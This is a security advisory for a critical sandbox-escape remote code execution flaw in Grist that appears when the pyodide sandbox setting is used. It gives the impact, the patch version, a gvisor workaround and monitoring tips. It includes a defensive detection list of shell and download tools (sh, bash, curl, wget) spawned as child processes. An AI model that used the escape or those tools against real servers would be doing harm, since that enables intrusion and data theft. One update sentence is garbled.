A critical vulnerability exists in the Grist spreadsheet software that allows for a sandbox escape, leading to remote code execution. If an administrator has configured a specific, non-default setting for formula processing, an attacker can gain full control of the server by tricking a user into opening a specially crafted spreadsheet. This could result in complete system compromise, data theft, and disruption of service.

The vulnerability exists in a specific, non-default configuration of the Grist application. Grist uses sandboxing to safely execute Python formulas contained within spreadsheets. When the environment variable GRIST_SANDBOX_FLAVOR is explicitly set to pyodide, the application uses a sandboxing method that is insecure on the underlying Node.js runtime. An attacker can craft a malicious spreadsheet with Python formulas that exploit this weak sandbox barrier, allowing them to break out of the intended confinement and execute arbitrary commands with the permissions of the Grist application on the host server.

This vulnerability is rated as critical severity with a CVSS score of 9.0, reflecting the high potential for significant business disruption. Successful exploitation could lead to a complete compromise of the server hosting the Grist application. This could result in the theft or modification of all sensitive data stored in spreadsheets, a breach of customer or internal information, and reputational damage. Furthermore, a compromised server could be used as a pivot point to launch further attacks against the internal network, escalating the security incident.

Immediate Action: Update Grist is spreadsheet software using Python as its formula Multiple Products to the latest version. Monitor for exploitation attempts and review access logs. The vulnerability is patched in Grist version 1.7.9 and higher.

Proactive Monitoring: Security teams should monitor for anomalous activity on Grist servers. Specifically, look for unexpected child processes being spawned by the Grist service (e.g., sh, bash, powershell, curl, wget). Monitor for unusual outbound network connections from the server, as this may indicate command-and-control communication or data exfiltration. Review application logs for errors or warnings related to the pyodide sandbox.

Compensating Controls: If immediate patching to version 1.7.9 or later is not feasible, implement the vendor-recommended workaround. Mitigate the vulnerability by changing the sandbox configuration; set the GRIST_SANDBOX_FLAVOR environment variable to gvisor, which provides a more secure sandboxing environment.

Public Exploit Available: false

Due to the critical CVSS score of 9.0 and the risk of complete server compromise, it is strongly recommended that organizations patch this vulnerability with the highest priority. The primary course of action is to upgrade all Grist instances to version 1.7.9 or newer. If patching must be delayed for any reason, the compensating control of switching the sandbox flavor to gvisor should be implemented immediately to mitigate the risk.